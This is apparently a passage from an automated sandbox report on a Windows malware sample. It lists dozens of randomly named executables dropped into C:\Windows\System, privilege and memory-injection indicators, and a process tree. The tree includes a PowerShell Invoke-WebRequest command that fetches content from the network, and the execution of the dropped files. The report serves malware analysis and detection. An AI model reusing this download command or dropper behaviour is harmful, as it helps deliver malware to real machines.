File created	C:\Windows\System\MBbwWTg.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\pBtHosX.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\rNxuicX.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\CxZxdTC.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\tyGiabL.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\wlkKpjr.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\ZvNBlSW.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\sACowwc.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\ZiqpXYK.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\HLhNqVm.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\lhTDXuw.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\tPtnSfA.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\mhGFdmZ.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\SUjOiyN.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\qARpvEh.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\UslaDUI.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\LUcAbgh.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\TQXnuBv.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\BQDFPvL.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\IlZILwI.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\taGZEar.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\DPIxKsK.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\NWANbnv.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\wjnSdRN.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\azjUino.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\vVtikzD.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\bhrwzqO.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\dNBreAs.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\JCSQYOB.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\JccoXmZ.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\BJPuNQF.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\XjhuQsz.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\sFYAKyk.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\DBiVoNB.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\snUpkTH.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\vpHkNNe.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\sbzGLrs.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3248	powershell.exe
3248	powershell.exe
3248	powershell.exe
3248	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
Token: SeLockMemoryPrivilege	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
Token: SeDebugPrivilege	3248	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4584 wrote to memory of 3248	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	90
PID 4584 wrote to memory of 3248	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	90
PID 4584 wrote to memory of 2860	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	91
PID 4584 wrote to memory of 2860	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	91
PID 4584 wrote to memory of 2292	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	92
PID 4584 wrote to memory of 2292	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	92
PID 4584 wrote to memory of 3176	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	93
PID 4584 wrote to memory of 3176	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	93
PID 4584 wrote to memory of 2160	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	94
PID 4584 wrote to memory of 2160	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	94
PID 4584 wrote to memory of 4572	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	95
PID 4584 wrote to memory of 4572	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	95
PID 4584 wrote to memory of 2228	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	96
PID 4584 wrote to memory of 2228	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	96
PID 4584 wrote to memory of 3940	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	97
PID 4584 wrote to memory of 3940	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	97
PID 4584 wrote to memory of 2920	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	98
PID 4584 wrote to memory of 2920	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	98
PID 4584 wrote to memory of 1488	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	99
PID 4584 wrote to memory of 1488	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	99
PID 4584 wrote to memory of 3748	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	100
PID 4584 wrote to memory of 3748	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	100
PID 4584 wrote to memory of 2324	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	101
PID 4584 wrote to memory of 2324	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	101
PID 4584 wrote to memory of 2196	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	102
PID 4584 wrote to memory of 2196	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	102
PID 4584 wrote to memory of 2720	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	103
PID 4584 wrote to memory of 2720	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	103
PID 4584 wrote to memory of 2440	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	104
PID 4584 wrote to memory of 2440	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	104
PID 4584 wrote to memory of 4864	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	105
PID 4584 wrote to memory of 4864	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	105
PID 4584 wrote to memory of 932	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	106
PID 4584 wrote to memory of 932	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	106
PID 4584 wrote to memory of 2192	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	107
PID 4584 wrote to memory of 2192	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	107
PID 4584 wrote to memory of 1000	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	109
PID 4584 wrote to memory of 1000	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	109
PID 4584 wrote to memory of 1440	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	110
PID 4584 wrote to memory of 1440	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	110
PID 4584 wrote to memory of 3188	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	111
PID 4584 wrote to memory of 3188	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	111
PID 4584 wrote to memory of 2900	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	112
PID 4584 wrote to memory of 2900	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	112
PID 4584 wrote to memory of 1256	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	113
PID 4584 wrote to memory of 1256	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	113
PID 4584 wrote to memory of 2096	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	114
PID 4584 wrote to memory of 2096	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	114
PID 4584 wrote to memory of 4940	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	115
PID 4584 wrote to memory of 4940	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	115
PID 4584 wrote to memory of 1840	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	116
PID 4584 wrote to memory of 1840	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	116
PID 4584 wrote to memory of 2696	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	117
PID 4584 wrote to memory of 2696	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	117
PID 4584 wrote to memory of 4992	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	118
PID 4584 wrote to memory of 4992	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	118
PID 4584 wrote to memory of 1804	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	119
PID 4584 wrote to memory of 1804	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	119
PID 4584 wrote to memory of 1852	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	120
PID 4584 wrote to memory of 1852	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	120
PID 4584 wrote to memory of 5064	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	121
PID 4584 wrote to memory of 5064	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	121
PID 4584 wrote to memory of 4048	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	122
PID 4584 wrote to memory of 4048	4584	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe	122

C:\Users\Admin\AppData\Local\Temp\4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
"C:\Users\Admin\AppData\Local\Temp\4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4584
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3248
- C:\Windows\System\ZqckURU.exe
  C:\Windows\System\ZqckURU.exe
  2⤵
  - Executes dropped EXE
  PID:2860
- C:\Windows\System\AkomxfY.exe
  C:\Windows\System\AkomxfY.exe
  2⤵
  - Executes dropped EXE
  PID:2292
- C:\Windows\System\EczyVzf.exe
  C:\Windows\System\EczyVzf.exe
  2⤵
  - Executes dropped EXE
  PID:3176
- C:\Windows\System\atYsBlU.exe
  C:\Windows\System\atYsBlU.exe
  2⤵
  - Executes dropped EXE
  PID:2160
- C:\Windows\System\tyGiabL.exe
  C:\Windows\System\tyGiabL.exe
  2⤵
  - Executes dropped EXE
  PID:4572
- C:\Windows\System\pYPZLlZ.exe
  C:\Windows\System\pYPZLlZ.exe
  2⤵
  - Executes dropped EXE
  PID:2228
- C:\Windows\System\vWPiBwM.exe
  C:\Windows\System\vWPiBwM.exe
  2⤵
  - Executes dropped EXE
  PID:3940
- C:\Windows\System\vEsShlp.exe
  C:\Windows\System\vEsShlp.exe
  2⤵
  - Executes dropped EXE
  PID:2920
- C:\Windows\System\nnJVWjo.exe
  C:\Windows\System\nnJVWjo.exe
  2⤵
  - Executes dropped EXE
  PID:1488
- C:\Windows\System\JTihoMm.exe
  C:\Windows\System\JTihoMm.exe
  2⤵
  - Executes dropped EXE
  PID:3748
- C:\Windows\System\uYwdnRX.exe
  C:\Windows\System\uYwdnRX.exe
  2⤵
  - Executes dropped EXE
  PID:2324
- C:\Windows\System\jBZuCFz.exe
  C:\Windows\System\jBZuCFz.exe
  2⤵
  - Executes dropped EXE
  PID:2196
- C:\Windows\System\EPYIRte.exe
  C:\Windows\System\EPYIRte.exe
  2⤵
  - Executes dropped EXE
  PID:2720
- C:\Windows\System\sbfuIaD.exe
  C:\Windows\System\sbfuIaD.exe
  2⤵
  - Executes dropped EXE
  PID:2440
- C:\Windows\System\DPrQitL.exe
  C:\Windows\System\DPrQitL.exe
  2⤵
  - Executes dropped EXE
  PID:4864
- C:\Windows\System\WpGPEiA.exe
  C:\Windows\System\WpGPEiA.exe
  2⤵
  - Executes dropped EXE
  PID:932
- C:\Windows\System\RcWyYWd.exe
  C:\Windows\System\RcWyYWd.exe
  2⤵
  - Executes dropped EXE
  PID:2192
- C:\Windows\System\arfZdck.exe
  C:\Windows\System\arfZdck.exe
  2⤵
  - Executes dropped EXE
  PID:1000
- C:\Windows\System\DhtnDba.exe
  C:\Windows\System\DhtnDba.exe
  2⤵
  - Executes dropped EXE
  PID:1440
- C:\Windows\System\mjMfxce.exe
  C:\Windows\System\mjMfxce.exe
  2⤵
  - Executes dropped EXE
  PID:3188
- C:\Windows\System\ntWukxU.exe
  C:\Windows\System\ntWukxU.exe
  2⤵
  - Executes dropped EXE
  PID:2900
- C:\Windows\System\cGfOJgU.exe
  C:\Windows\System\cGfOJgU.exe
  2⤵
  - Executes dropped EXE
  PID:1256
- C:\Windows\System\KWjfKRS.exe
  C:\Windows\System\KWjfKRS.exe
  2⤵
  - Executes dropped EXE
  PID:2096
- C:\Windows\System\PWnXZhu.exe
  C:\Windows\System\PWnXZhu.exe
  2⤵
  - Executes dropped EXE
  PID:4940
- C:\Windows\System\uopfwFE.exe
  C:\Windows\System\uopfwFE.exe
  2⤵
  - Executes dropped EXE
  PID:1840
- C:\Windows\System\TOXQnzM.exe
  C:\Windows\System\TOXQnzM.exe
  2⤵
  - Executes dropped EXE
  PID:2696
- C:\Windows\System\lsMKahp.exe
  C:\Windows\System\lsMKahp.exe
  2⤵
  - Executes dropped EXE
  PID:4992
- C:\Windows\System\NEEHabY.exe
  C:\Windows\System\NEEHabY.exe
  2⤵
  - Executes dropped EXE
  PID:1804
- C:\Windows\System\xaNIySo.exe
  C:\Windows\System\xaNIySo.exe
  2⤵
  - Executes dropped EXE
  PID:1852
- C:\Windows\System\MxwbGeB.exe
  C:\Windows\System\MxwbGeB.exe
  2⤵
  - Executes dropped EXE
  PID:5064
- C:\Windows\System\dHOwczS.exe
  C:\Windows\System\dHOwczS.exe
  2⤵
  - Executes dropped EXE
  PID:4048
- C:\Windows\System\SjRBIRs.exe
  C:\Windows\System\SjRBIRs.exe
  2⤵
  - Executes dropped EXE
  PID:1144
- C:\Windows\System\CcttmCl.exe
  C:\Windows\System\CcttmCl.exe
  2⤵
  - Executes dropped EXE
  PID:2924
- C:\Windows\System\lMiblVa.exe
  C:\Windows\System\lMiblVa.exe
  2⤵
  - Executes dropped EXE
  PID:3008
- C:\Windows\System\DTzetmc.exe
  C:\Windows\System\DTzetmc.exe
  2⤵
  - Executes dropped EXE
  PID:5088
- C:\Windows\System\fzYSJUt.exe
  C:\Windows\System\fzYSJUt.exe
  2⤵
  - Executes dropped EXE
  PID:3312
- C:\Windows\System\vPlczqn.exe
  C:\Windows\System\vPlczqn.exe
  2⤵
  - Executes dropped EXE
  PID:2800
- C:\Windows\System\vNCbtNb.exe
  C:\Windows\System\vNCbtNb.exe
  2⤵
  - Executes dropped EXE
  PID:2072
- C:\Windows\System\RMUvZEa.exe
  C:\Windows\System\RMUvZEa.exe
  2⤵
  - Executes dropped EXE
  PID:2724
- C:\Windows\System\sogRRSj.exe
  C:\Windows\System\sogRRSj.exe
  2⤵
  - Executes dropped EXE
  PID:380
- C:\Windows\System\kzfBfEo.exe
  C:\Windows\System\kzfBfEo.exe
  2⤵
  - Executes dropped EXE
  PID:2248
- C:\Windows\System\oHsUzyt.exe
  C:\Windows\System\oHsUzyt.exe
  2⤵
  - Executes dropped EXE
  PID:3840
- C:\Windows\System\bUJayta.exe
  C:\Windows\System\bUJayta.exe
  2⤵
  - Executes dropped EXE
  PID:3164
- C:\Windows\System\pzfqRtq.exe
  C:\Windows\System\pzfqRtq.exe
  2⤵
  - Executes dropped EXE
  PID:4724
- C:\Windows\System\ZckglTY.exe
  C:\Windows\System\ZckglTY.exe
  2⤵
  - Executes dropped EXE
  PID:540
- C:\Windows\System\TSETXEa.exe
  C:\Windows\System\TSETXEa.exe
  2⤵
  - Executes dropped EXE
  PID:692
- C:\Windows\System\XJDyenz.exe
  C:\Windows\System\XJDyenz.exe
  2⤵
  - Executes dropped EXE
  PID:3728
- C:\Windows\System\PrVNzNt.exe
  C:\Windows\System\PrVNzNt.exe
  2⤵
  - Executes dropped EXE
  PID:2844
- C:\Windows\System\gDwnpUR.exe
  C:\Windows\System\gDwnpUR.exe
  2⤵
  - Executes dropped EXE
  PID:3488
- C:\Windows\System\BQDFPvL.exe
  C:\Windows\System\BQDFPvL.exe
  2⤵
  - Executes dropped EXE
  PID:2328
- C:\Windows\System\NWANbnv.exe
  C:\Windows\System\NWANbnv.exe
  2⤵
  - Executes dropped EXE
  PID:3800
- C:\Windows\System\rBFWpgu.exe
  C:\Windows\System\rBFWpgu.exe
  2⤵
  - Executes dropped EXE
  PID:2768
- C:\Windows\System\ubMBFzl.exe
  C:\Windows\System\ubMBFzl.exe
  2⤵
  - Executes dropped EXE
  PID:3304
- C:\Windows\System\TxeweMT.exe
  C:\Windows\System\TxeweMT.exe
  2⤵
  - Executes dropped EXE
  PID:60
- C:\Windows\System\EBCdjuc.exe
  C:\Windows\System\EBCdjuc.exe
  2⤵
  - Executes dropped EXE
  PID:4388
- C:\Windows\System\TPiZDeA.exe
  C:\Windows\System\TPiZDeA.exe
  2⤵
  - Executes dropped EXE
  PID:1704
- C:\Windows\System\ONzucxH.exe
  C:\Windows\System\ONzucxH.exe
  2⤵
  - Executes dropped EXE
  PID:5144
- C:\Windows\System\ByvINog.exe
  C:\Windows\System\ByvINog.exe
  2⤵
  - Executes dropped EXE
  PID:5172
- C:\Windows\System\VvITouM.exe
  C:\Windows\System\VvITouM.exe
  2⤵
  - Executes dropped EXE
  PID:5196
- C:\Windows\System\uaiiAKl.exe
  C:\Windows\System\uaiiAKl.exe
  2⤵
  - Executes dropped EXE
  PID:5220
- C:\Windows\System\lcPbdrq.exe
  C:\Windows\System\lcPbdrq.exe
  2⤵
  - Executes dropped EXE
  PID:5244
- C:\Windows\System\ZvHtKuI.exe
  C:\Windows\System\ZvHtKuI.exe
  2⤵
  - Executes dropped EXE
  PID:5268
- C:\Windows\System\zDtPraw.exe
  C:\Windows\System\zDtPraw.exe
  2⤵
  - Executes dropped EXE
  PID:5292
- C:\Windows\System\jlzrHvr.exe
  C:\Windows\System\jlzrHvr.exe
  2⤵
  - Executes dropped EXE
  PID:5316
- C:\Windows\System\gdEYPpX.exe
  C:\Windows\System\gdEYPpX.exe
  2⤵
  PID:5340
- C:\Windows\System\jTeOble.exe
  C:\Windows\System\jTeOble.exe
  2⤵
  PID:5364
- C:\Windows\System\XNNCLtq.exe
  C:\Windows\System\XNNCLtq.exe
  2⤵
  PID:5388
- C:\Windows\System\WycWYJH.exe
  C:\Windows\System\WycWYJH.exe
  2⤵
  PID:5412
- C:\Windows\System\zGkRVUD.exe
  C:\Windows\System\zGkRVUD.exe
  2⤵
  PID:5436
- C:\Windows\System\iaqrFeF.exe
  C:\Windows\System\iaqrFeF.exe
  2⤵
  PID:5460
- C:\Windows\System\nsdNhRV.exe
  C:\Windows\System\nsdNhRV.exe
  2⤵
  PID:5484
- C:\Windows\System\dYUgNuU.exe
  C:\Windows\System\dYUgNuU.exe
  2⤵
  PID:5508
- C:\Windows\System\QsvoYQT.exe
  C:\Windows\System\QsvoYQT.exe
  2⤵
  PID:5532
- C:\Windows\System\OfDxZDe.exe
  C:\Windows\System\OfDxZDe.exe
  2⤵
  PID:5556
- C:\Windows\System\BJPuNQF.exe
  C:\Windows\System\BJPuNQF.exe
  2⤵
  PID:5580
- C:\Windows\System\jAYPJCA.exe
  C:\Windows\System\jAYPJCA.exe
  2⤵
  PID:5604
- C:\Windows\System\AnqOzJn.exe
  C:\Windows\System\AnqOzJn.exe
  2⤵
  PID:5628
- C:\Windows\System\VyyLsXu.exe
  C:\Windows\System\VyyLsXu.exe
  2⤵
  PID:5652
- C:\Windows\System\iVZVeVW.exe
  C:\Windows\System\iVZVeVW.exe
  2⤵
  PID:5676
- C:\Windows\System\SMKfxBV.exe
  C:\Windows\System\SMKfxBV.exe
  2⤵
  PID:5700
- C:\Windows\System\ycUpWtT.exe
  C:\Windows\System\ycUpWtT.exe
  2⤵
  PID:5724
- C:\Windows\System\DluXaMV.exe
  C:\Windows\System\DluXaMV.exe
  2⤵
  PID:5748
- C:\Windows\System\jXmmXBB.exe
  C:\Windows\System\jXmmXBB.exe
  2⤵
  PID:5772
- C:\Windows\System\HosmMBN.exe
  C:\Windows\System\HosmMBN.exe
  2⤵
  PID:5796
- C:\Windows\System\jMVtlWF.exe
  C:\Windows\System\jMVtlWF.exe
  2⤵
  PID:5820
- C:\Windows\System\jxPXnIa.exe
  C:\Windows\System\jxPXnIa.exe
  2⤵
  PID:5844
- C:\Windows\System\NlrKSiS.exe
  C:\Windows\System\NlrKSiS.exe
  2⤵
  PID:5868
- C:\Windows\System\wKGDgQg.exe
  C:\Windows\System\wKGDgQg.exe
  2⤵
  PID:5892
- C:\Windows\System\jstSFyf.exe
  C:\Windows\System\jstSFyf.exe
  2⤵
  PID:5916
- C:\Windows\System\ArnbwZc.exe
  C:\Windows\System\ArnbwZc.exe
  2⤵
  PID:5940
- C:\Windows\System\AFiJAWW.exe
  C:\Windows\System\AFiJAWW.exe
  2⤵
  PID:5964
- C:\Windows\System\BpqMFUk.exe
  C:\Windows\System\BpqMFUk.exe
  2⤵
  PID:5996
- C:\Windows\System\IlZILwI.exe
  C:\Windows\System\IlZILwI.exe
  2⤵
  PID:6100
- C:\Windows\System\xLSsWUz.exe
  C:\Windows\System\xLSsWUz.exe
  2⤵
  PID:2212
- C:\Windows\System\DWNUHCf.exe
  C:\Windows\System\DWNUHCf.exe
  2⤵
  PID:5644
- C:\Windows\System\EQmOwty.exe
  C:\Windows\System\EQmOwty.exe
  2⤵
  PID:5760
- C:\Windows\System\wPXdNyj.exe
  C:\Windows\System\wPXdNyj.exe
  2⤵
  PID:5856
- C:\Windows\System\UDikLdX.exe
  C:\Windows\System\UDikLdX.exe
  2⤵
  PID:1692
- C:\Windows\System\FsXHnWq.exe
  C:\Windows\System\FsXHnWq.exe
  2⤵
  PID:6044
- C:\Windows\System\vZNAUwm.exe
  C:\Windows\System\vZNAUwm.exe
  2⤵
  PID:5992
- C:\Windows\System\XqLFcbX.exe
  C:\Windows\System\XqLFcbX.exe
  2⤵
  PID:6012
- C:\Windows\System\aLmizKR.exe
  C:\Windows\System\aLmizKR.exe
  2⤵
  PID:4952
- C:\Windows\System\yzhZmbD.exe
  C:\Windows\System\yzhZmbD.exe
  2⤵
  PID:6060
- C:\Windows\System\vpHkNNe.exe
  C:\Windows\System\vpHkNNe.exe
  2⤵
  PID:6108
- C:\Windows\System\GqBaycU.exe
  C:\Windows\System\GqBaycU.exe
  2⤵
  PID:4624
- C:\Windows\System\natIehG.exe
  C:\Windows\System\natIehG.exe
  2⤵
  PID:5212
- C:\Windows\System\jEEtyLd.exe
  C:\Windows\System\jEEtyLd.exe
  2⤵
  PID:5352
- C:\Windows\System\GwJVxsG.exe
  C:\Windows\System\GwJVxsG.exe
  2⤵
  PID:5472
- C:\Windows\System\hBNTHNt.exe
  C:\Windows\System\hBNTHNt.exe
  2⤵
  PID:5548
- C:\Windows\System\RTfOgoF.exe
  C:\Windows\System\RTfOgoF.exe
  2⤵
  PID:3692
- C:\Windows\System\tPtnSfA.exe
  C:\Windows\System\tPtnSfA.exe
  2⤵
  PID:1548
- C:\Windows\System\AFRIHrL.exe
  C:\Windows\System\AFRIHrL.exe
  2⤵
  PID:872
- C:\Windows\System\sbzGLrs.exe
  C:\Windows\System\sbzGLrs.exe
  2⤵
  PID:4464
- C:\Windows\System\KSovBpv.exe
  C:\Windows\System\KSovBpv.exe
  2⤵
  PID:5616
- C:\Windows\System\MEMKrzG.exe
  C:\Windows\System\MEMKrzG.exe
  2⤵
  PID:2520
- C:\Windows\System\XNueYxY.exe
  C:\Windows\System\XNueYxY.exe
  2⤵
  PID:5712
- C:\Windows\System\vUsnFEL.exe
  C:\Windows\System\vUsnFEL.exe
  2⤵
  PID:5952
- C:\Windows\System\dvsyjks.exe
  C:\Windows\System\dvsyjks.exe
  2⤵
  PID:6024
- C:\Windows\System\IeGKNuV.exe
  C:\Windows\System\IeGKNuV.exe
  2⤵
  PID:6084
- C:\Windows\System\MfTWXGV.exe
  C:\Windows\System\MfTWXGV.exe
  2⤵
  PID:5332
- C:\Windows\System\fFzXPJu.exe
  C:\Windows\System\fFzXPJu.exe
  2⤵
  PID:5572
- C:\Windows\System\AdHKged.exe
  C:\Windows\System\AdHKged.exe
  2⤵
  PID:5048
- C:\Windows\System\VTyptIf.exe
  C:\Windows\System\VTyptIf.exe
  2⤵
  PID:5640
- C:\Windows\System\uMAxcFh.exe
  C:\Windows\System\uMAxcFh.exe
  2⤵
  PID:4920
- C:\Windows\System\InWjiHK.exe
  C:\Windows\System\InWjiHK.exe
  2⤵
  PID:736
- C:\Windows\System\aBxAneq.exe
